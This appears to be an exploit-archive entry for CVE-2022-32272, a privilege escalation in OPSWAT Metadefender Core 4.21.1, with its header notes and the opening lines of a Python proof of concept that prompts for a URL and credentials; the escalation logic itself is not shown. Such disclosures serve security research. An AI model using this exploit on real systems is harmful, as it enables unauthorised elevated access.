Exploits / Vulnerability Discovered : 2023-03-28 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Opswat metadefender core privilege escalation is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: OPSWAT Metadefender Core - Privilege Escalation
# Date: 24 October 2022
# Exploit Author: Ulascan Yildirim
# Vendor Homepage: https://www.opswat.com/
# Version: Metadefender Core 4.21.1
# Tested on: Windows / Linux
# CVE : CVE-2022-32272
# =============================================================================
# This is a PoC for the Metadefender Core Privilege escalation vulnerability.
# To use this PoC, you need a Username & Password.
# The OMS_CSRF_TOKEN allows users to execute commands with higher privileges.
# =============================================================================
#!/usr/bin/env python3
import requests
import json
from getpass import getpass
url = input("Enter URL in this Format (http://website.com): ")
username = input("Username: ")
password = getpass("Password: ")